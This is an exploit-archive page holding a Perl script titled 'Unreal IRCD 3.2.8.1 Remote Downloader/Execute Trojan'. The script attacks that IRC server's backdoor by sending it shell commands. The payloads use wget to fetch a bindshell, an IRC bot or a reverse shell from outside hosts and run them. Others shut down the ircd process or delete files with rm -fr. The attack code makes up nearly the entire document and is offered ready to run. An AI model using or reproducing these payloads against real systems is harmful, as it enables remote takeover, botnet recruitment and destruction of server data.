[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Unreal IRCD 3.2.8.1 Remote Downloader/Execute Trojan
# Published : 2010-06-13
# Author : anonymous
# Previous Title : Litespeed Technologies Web Server Remote Poison null byte Exploit
# Next Title : Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
#!/usr/bin/perl
# Unreal3.2.8.1 Remote Downloader/Execute Trojan
# DO NOT DISTRIBUTE -PRIVATE-
# -iHaq (2l8)
use Socket;
use IO::Socket;
## Payload options
my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &';
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';
my $payload4 = 'AB; killall ircd';
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';
$host = "";
$port = "";
$type = "";
$host = @ARGV[0];
$port = @ARGV[1];
$type = @ARGV[2];
if ($host eq "") { usage(); }
if ($port eq "") { usage(); }
if ($type eq "") { usage(); }
sub usage {
printf "nUsage :n";
printf "perl unrealpwn.pl <host> <port> <type>nn";
printf "Command list :n";
printf "[1] - Perl Bindshelln";
printf "[2] - Perl Reverse Shelln";
printf "[3] - Perl Botn";
printf "-----------------------------n";
printf "[4] - shutdown ircservern";
printf "[5] - delete ircservern";
exit(1);
}
sub unreal_trojan {
my $ircserv = $host;
my $ircport = $port;
my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...nn";
print "[+] Payload sent ...n";
if ($type eq "1") {
print $sockd "$payload1";
} elsif ($type eq "2") {
print $sockd "$payload2";
} elsif ($type eq "3") {
print $sockd "$payload3";
} elsif ($type eq "4") {
print $sockd "$payload4";
} elsif ($type eq "5") {
print $sockd "$payload5";
} else {
printf "nInvalid Option ...nn";
usage();
}
close($sockd);
exit(1);
}
unreal_trojan();
# EOF